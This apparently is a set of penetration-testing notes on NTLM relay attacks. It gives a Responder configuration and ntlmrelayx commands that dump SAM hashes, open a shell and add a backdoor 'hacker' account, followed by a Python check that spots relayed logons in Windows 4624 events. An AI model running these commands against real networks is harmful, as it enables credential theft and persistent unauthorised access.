[Responder Core]
; Set SMB and HTTP to Off to avoid conflicts with ntlmrelayx
SMB = Off
HTTP = Off
HTTPS = On
LDAP = On
RDP = On
SQL = On
FTP = On
POP = On
IMAP = On
SMTP = On
DNS = On
Step 2: Set up ntlmrelayx
Start ntlmrelayx with a target list:
# Basic relay to execute commands
ntlmrelayx.py -tf targets.txt -c "whoami"

# Relay and attempt to dump SAM
ntlmrelayx.py -tf targets.txt --sam

# Relay and get interactive SMB shell
ntlmrelayx.py -tf targets.txt -i

# Relay and execute specific command
ntlmrelayx.py -tf targets.txt -c "net user hacker P@ssw0rd123 /add"
Alternative: target a specific host:
# Single target
ntlmrelayx.py -t 192.168.1.10 -c "whoami"
Step 3: Start Responder
Run Responder to capture authentication:
# Basic responder on interface
responder -I eth0 -A

# Responder with analysis mode first (recommended)
responder -I eth0 -A -f

# Responder in verbose mode
responder -I eth0 -v
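On the defending side, a relayed logon appears on the target as a Security event 4624 (NTLM, logon type 3) whose WorkstationName is the victim's machine while IpAddress is the relay host. The Python check below is an added example, not part of the original notes; the inventory mapping, the `ev` helper and the event records are constructed for illustration, and the field names follow the 4624 event data.

```python
import ipaddress

# Assumption: hostname -> known addresses, exported from DHCP/DNS or a CMDB.
INVENTORY = {"WS-FINANCE01": {"192.168.1.51"}, "WS-HR02": {"192.168.1.52"}}

def ev(user, pkg, host, ip, logon_type=3):
    """Build one constructed 4624 record using the event's EventData field names."""
    return {"TargetUserName": user, "LogonType": logon_type,
            "AuthenticationPackageName": pkg, "WorkstationName": host, "IpAddress": ip}

# Constructed sample events, not taken from a real log.
EVENTS = [
    ev("alice", "NTLM", "WS-FINANCE01", "192.168.1.51"),   # name and address agree
    ev("bob", "NTLM", "WS-HR02", "192.168.1.200"),         # name and address disagree
    ev("carol", "Kerberos", "-", "192.168.1.52"),          # not NTLM
    ev("dave", "NTLM", "LAPTOP-X", "192.168.1.77"),        # host missing from inventory
    ev("ANONYMOUS LOGON", "NTLM", "", "-"),                # nothing to compare
]

def classify(event, inventory=INVENTORY):
    """Return 'mismatch', 'unknown-host' or None for one 4624 record."""
    if event.get("LogonType") != 3 or event.get("AuthenticationPackageName") != "NTLM":
        return None  # only NTLM network logons are relevant to relaying
    host = (event.get("WorkstationName") or "").strip().upper()
    try:
        src = ipaddress.ip_address(event.get("IpAddress") or "")
    except ValueError:
        return None  # '-' or empty: no source address recorded
    if not host or host == "-" or src.is_loopback:
        return None
    known = inventory.get(host)
    if known is None:
        return "unknown-host"  # cannot be verified; triage separately
    return None if str(src) in known else "mismatch"

def suspicious(events, inventory=INVENTORY):
    """Return (user, workstation, source, verdict) for every flagged record."""
    hits = []
    for e in events:
        verdict = classify(e, inventory)
        if verdict:
            hits.append((e["TargetUserName"], e["WorkstationName"], e["IpAddress"], verdict))
    return hits

if __name__ == "__main__":
    for hit in suspicious(EVENTS):
        print(hit)
```

Hosts with several interfaces or addresses behind NAT need every legitimate address in the inventory, otherwise they surface as mismatches.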